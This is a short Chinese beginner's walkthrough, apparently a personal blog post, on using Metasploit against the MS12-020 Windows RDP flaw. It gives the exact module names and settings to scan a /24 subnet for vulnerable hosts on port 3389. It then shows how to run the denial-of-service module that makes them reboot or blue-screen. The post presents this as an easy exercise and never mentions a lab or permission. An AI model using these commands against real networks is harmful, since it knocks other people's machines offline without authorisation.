据说这个漏洞是微软在12年发布的一个系统漏洞,针对winxp和win sever2003,通过攻击,导致重启或蓝屏。
来说说利用过程,过程还是很简单的,让我觉得还是挺适合新手。。。但是攻击目标必须开着3389端口,,,这,,咳咳还是说过程吧。。。
search ms12_020
第二个是扫描,用来扫描网段上有漏洞的主机,第一个是攻击模块
use auxiliary/scanner/rdp/ms12_020_check
然后show options 查看需要什么设置,发现需要网段和线程都可以设置
设置网段(就是目标网段)RHOSTS ***.***.***.***/24
线程: THREADS 我设置的是 45
输入run 就开始了
扫描到the target is vulnerable 就找到了一个
接下来 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
同样show options查看设置
这里只需要给个地址,那么 set RHOST ***.***.***.***
然后run
就完事了,就这么愉快的结束了,,没啥意思,,,也没有控制啥的,,没劲